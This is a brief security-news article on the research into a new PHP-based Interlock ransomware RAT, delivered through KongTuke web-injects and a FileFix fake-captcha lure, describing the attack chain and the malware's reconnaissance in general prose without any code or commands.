KongTuke FileFix Leads to New Interlock RAT Variant
Researchers identified a new PHP-based variant of the Interlock ransomware group's RAT, shifting from JavaScript-based NodeSnake, used in widespread attacks since May 2025.
Researchers from The DFIR Report, in partnership with Proofpoint, have identified a new and resilient variant of the Interlock ransomware group's remote access trojan (RAT). This new malware, a shift from the previously identified JavaScript-based Interlock RAT (aka NodeSnake), uses PHP and is being used in a widespread campaign.
Since May 2025, activity related to the Interlock RAT has been observed in connection with the LandUpdate808 (aka KongTuke) web-inject threat clusters. The campaign begins with compromised websites injected with a single-line script hidden in the page's HTML, often unbeknownst to site owners or visitors.
The linked JavaScript employs heavy IP filtering to serve the payload, which first prompts the user to click a captcha to “Verify you are human” followed by “Verification steps” to open a run command and paste in from the clipboard. If pasted into the run command it will execute a PowerShell script which eventually leads to Interlock RAT.
Proofpoint researchers have observed both Interlock RAT Node.js and Interlock RAT PHP based variants. The Interlock RAT PHP based variant was first spotted in June 2025 campaigns. The DFIR Report researchers have recently seen this same KongTuke web-inject transitioning to a FileFix variant.
This updated delivery mechanism has been observed deploying the PHP variant of the Interlock RAT, which in certain cases has then led to the deployment of the Node.js variant of the Interlock RAT. The PHP variant is more resilient and uses a config file loaded from a non-standard location.
Upon execution, the Interlock RAT immediately performs automated reconnaissance of the compromised system. It uses a series of PowerShell commands to gather and exfiltrate a comprehensive system profile as JSON data, including system specifications, running processes, services, drives, and network neighbors. The malware also checks its own privilege level.
The execution chain shows strong evidence of an interactive session, with hands-on keyboard discovery commands observed, including Active Directory queries for computers and users. The campaign highlights the evolving tactics of the Interlock ransomware group, which continues to refine its toolset to evade detection and maximize impact.